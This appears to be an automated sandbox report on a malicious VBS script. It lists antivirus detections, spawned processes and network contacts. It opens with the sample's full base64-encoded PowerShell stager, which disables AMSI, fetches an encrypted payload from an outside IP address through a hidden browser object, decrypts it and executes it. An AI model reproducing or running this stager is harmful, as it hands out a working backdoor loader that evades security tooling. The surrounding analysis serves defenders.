AFIARQBGAF0ALgBBAHMAUwBFAE0AYgBsAHkALgBHAEUAVABUAHkAcABlACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AQQBtAHMAaQAnACsAJwBVAHQAaQBsAHMAJwApADsAJABSAGUAZgAuAEcAZQB0AEYASQBlAGwARAAoACcAYQBtAHMAaQBJAG4AaQB0AEYAJwArACcAYQBpAGwAZQBkACcALAAnAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAGMAJwApAC4AUwBlAHQAVgBBAEwAVQBFACgAJABOAHUAbABMACwAJABUAHIAdQBlACkAOwB9ADsAWwBTAHkAcwBUAEUAbQAuAE4AZQBUAC4AUwBFAHIAVgBpAGMAZQBQAG8ASQBOAFQATQBBAG4AYQBnAEUAcgBdADoAOgBFAFgAUABlAEMAVAAxADAAMABDAG8ATgB0AEkAbgB1AEUAPQAwADsAJABlADIAYgA9AFsAUwB5AHMAdABFAE0ALgBUAEUAeAB0AC4ARQBuAGMAbwBkAGkATgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQBUAEIAeQB0AGUAUwAoACcAZAA0ACwAMABnAGsAQABbAFAAKgAhAC8AZgBzAHQAYQA6AGIANwBRAEIAaABsAFUARAByADYAeABFAF0AMwBfACcAKQA7ACQAUgA9AHsAJABEACwAJABlADIAYgA9ACQAQQBSAEcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsAMAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWwAkAF8AXQArACQAZQAyAEIAWwAkAF8AJQAkAEUAMgBCAC4AQwBPAFUAbgB0AF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAaQBlAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AQwBPAE0AIABJAG4AdABlAHIAbgBlAHQARQB4AHAAbABvAHIAZQByAC4AQQBwAHAAbABpAGMAYQB0AGkAbwBuADsAJABpAGUALgBTAGkAbABlAG4AdAA9ACQAVAByAHUAZQA7ACQAaQBlAC4AdgBpAHMAaQBiAGwAZQA9ACQARgBhAGwAcwBlADsAJABmAGwAPQAxADQAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUATgBDAG8AZABJAG4ARwBdADoAOgBVAG4AaQBjAE8AZABFAC4ARwBlAFQAUwB0AHIAaQBOAEcAKABbAEMAbwBuAFYAZQBSAHQAXQA6ADoARgBSAE8AbQBCAEEAcwBFADYANABTAFQAUgBJAE4ARwAoACcAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQA0AEEARABrAEEATABnAEEAeABBAEQAawBBAE4AdwBBAHUAQQBEAEUAQQBOAFEAQQAwAEEAQwA0AEEATQBRAEEAeABBAEQAWQBBAE8AZwBBADMAQQBEAGcAQQBNAFEAQQB3AEEAQQA9AD0AJwApACkAKQA7ACQAdAA9ACcALwBsAG8AZwBpAG4ALwBwAHIAbwBjAGUAcwBzAC4AcABoAHAAJwA7ACQAYwA9ACIAQwBGAC0AUgBBAFkAOgAgAGIAJwBwAEwAOABjADEAcgBJAFUATQBQAGMAWQBXADAATAAxAFcAYwBRAEwARgBPAE4AcQBDAEgAQQA9ACcAIgA7ACQAaQBlAC4AbgBhAHYAaQBnAGEAdABlADIAKAAkAHMAZQByACsAJAB0ACwAJABmAGwALAAwACwAJABOAHUAbABsACwAJABjACkAOwB3AGgAaQBsAGUAKAAkAGkAZQAuAGIAdQBzAHkAKQB7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgAC0ATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAIAAxADAAMAB9ADsAJABoAHQAIAA9ACAAJABpAGUALgBkAG8AYwB1AG0AZQBuAHQALgBHAGUAdABUAHkAcABlACgAKQAuAEkAbgB2AG8AawBlAE0AZQBtAGIAZQByACgAJwBiAG8AZAB5ACcALAAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQgBpAG4AZABpAG4AZwBGAGwAYQBnAHMAXQA6ADoARwBlAHQAUAByAG8AcABlAHIAdAB5ACwAIAAkAE4AdQBsAGwALAAgACQAaQBlAC4AZABvAGMAdQBtAGUAbgB0ACwAIAAkAE4AdQBsAGwAKQAuAEkAbgBuAGUAcgBIAHQAbQBsADsAdAByAHkAIAB7ACQAZABhAHQAYQA9AFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGgAdAApAH0AIABjAGEAdABjAGgAIAB7ACQATgB1AGwAbAB9ACQASQB2AD0AJABEAEEAVABhAFsAMAAuAC4AMwBdADsAJABEAEEAdABBAD0AJABkAEEAVABhAFsANAAuAC4AJABkAEEAVABBAC4ATABlAE4AZwB0AGgAXQA7AC0AagBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQARQAyAGIAKQApACAAfAAgAEkARQBYAA==

Creates a suspicious Powershell process (2 events)

option	-nop				value	Does not load current user profile
option	-nop				value	Does not load current user profile

File has been identified by 30 AntiVirus engines on VirusTotal as malicious (30 events)

Cynet	Malicious (score: 99)
CAT-QuickHeal	Script.Trojan.39876
Skyhigh	PS/Dropper.f
ALYac	GT:VB.ObfDldr.28.29C080A2
VIPRE	GT:VB.ObfDldr.28.29C080A2
Sangfor	Malware.Generic-VBS.Save.f99adb70
Arcabit	GT:VB.ObfDldr.28.29C080A2
Symantec	Trojan.Malscript!gen8
ESET-NOD32	PowerShell/TrojanDownloader.Agent.ABM
McAfee	PS/Dropper.f
Avast	VBS:Downloader-AXD [Trj]
Kaspersky	HEUR:Trojan.PowerShell.Generic
BitDefender	GT:VB.ObfDldr.28.29C080A2
NANO-Antivirus	Trojan.Script.Downloader.inbiqr
MicroWorld-eScan	GT:VB.ObfDldr.28.29C080A2
Emsisoft	GT:VB.ObfDldr.28.29C080A2 (B)
F-Secure	Malware.VBS/PSRunner.VPSV
FireEye	GT:VB.ObfDldr.28.29C080A2
Sophos	ATK/Empire-U
Google	Detected
Avira	VBS/PSRunner.VPSV
Xcitium	TrojWare.Win32.BadShell.XSN@7pmib7
Microsoft	Trojan:PowerShell/Fleisnam.E
ZoneAlarm	HEUR:Trojan.PowerShell.Generic
GData	GT:VB.ObfDldr.28.29C080A2
AhnLab-V3	Powershell/Downloader.S5
Tencent	Heur:Trojan.Powershell.Generic.u
MAX	malware (ai score=88)
Fortinet	PowerShell/Agent.AN!tr
AVG	VBS:Downloader-AXD [Trj]

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (20 events)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

Connects to IP addresses that are no longer responding to requests (legitimate services will remain up-and-running usually) (4 events)

dead_host	192.168.56.102:49164
dead_host	192.168.56.102:49165
dead_host	192.168.56.102:49163
dead_host	89.197.154.116:7810

Explore.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All